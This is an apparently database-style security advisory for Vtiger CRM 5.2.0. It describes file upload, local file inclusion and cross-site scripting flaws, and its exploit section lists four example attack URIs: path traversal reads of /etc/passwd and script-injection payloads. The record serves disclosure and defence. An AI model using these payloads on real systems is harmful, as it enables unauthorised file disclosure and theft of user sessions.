ID

VAR-E-201011-0392

TITLE

Vtiger CRM Multiple Remote Security Vulnerabilities

DESCRIPTION

Vtiger CRM is prone to an arbitrary-file-upload vulnerability, multiple local file-include vulnerabilities, and multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Attackers can exploit these issues to upload and execute arbitrary code in the context of the webserver process, view and execute arbitrary local files within the context of the webserver process, steal cookie-based authentication information, execute arbitrary client-side scripts in the context of the browser, and obtain sensitive information. Other attacks are also possible.
Vtiger CRM 5.2.0 is vulnerable; other versions may also be affected.

AFFECTED PRODUCTS

EXPLOIT

Attackers can exploit these issues through a browser. To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/vtigercrm/phprint.php?lang_crm=/../[..]/../etc/passwd%00&module=a&action=a&activity_mode=
http://www.example.com/vtigercrm/graph.php?current_language=/../[..]/../etc/passwd%00&module=Accounts&action=Import&parenttab=Support
http://www.example.com/vtigercrm/index.php?module=Users&action=Login&default_user_name=%22%20onmouseover=%22javascript:alert('XSS');
http://www.example.com/vtigercrm/index.php?module=Settings&action=GetFieldInfo&label=%3Cscript%3Ealert(123)%3C/scrip%3E

PRICE

Free

TYPE

Input Validation Error

CREDITS

Giovanni and Alessandro

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:38:24.111000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE